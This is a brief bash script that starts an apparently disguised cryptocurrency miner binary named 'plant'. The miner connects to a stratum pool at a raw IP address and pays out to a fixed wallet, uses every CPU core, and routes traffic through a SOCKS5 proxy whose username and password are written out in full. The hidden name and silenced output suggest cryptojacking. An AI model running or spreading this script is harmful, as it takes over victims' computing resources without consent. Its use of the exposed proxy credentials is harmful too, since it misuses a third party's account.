#!/bin/bash

chmod +x plant  >/dev/null 2>&1
./plant -a yespower -o stratum+tcp://103.249.70.7:6533 -u 4AZ6u7wEVZ7EDFAXCnZGkf1PwRPMDStboTzzwJhf1LcJiK3Ki4H2SgjVCnFsgkwDoVa5De6zWQaXUcsEz1Hgu7b1LnvBTpu.wrk -p c=TRX,mc=XMR -t $(nproc) -x socks5://ubuntu2004-rotate:LijayaAnli1188@p.webshare.io:80
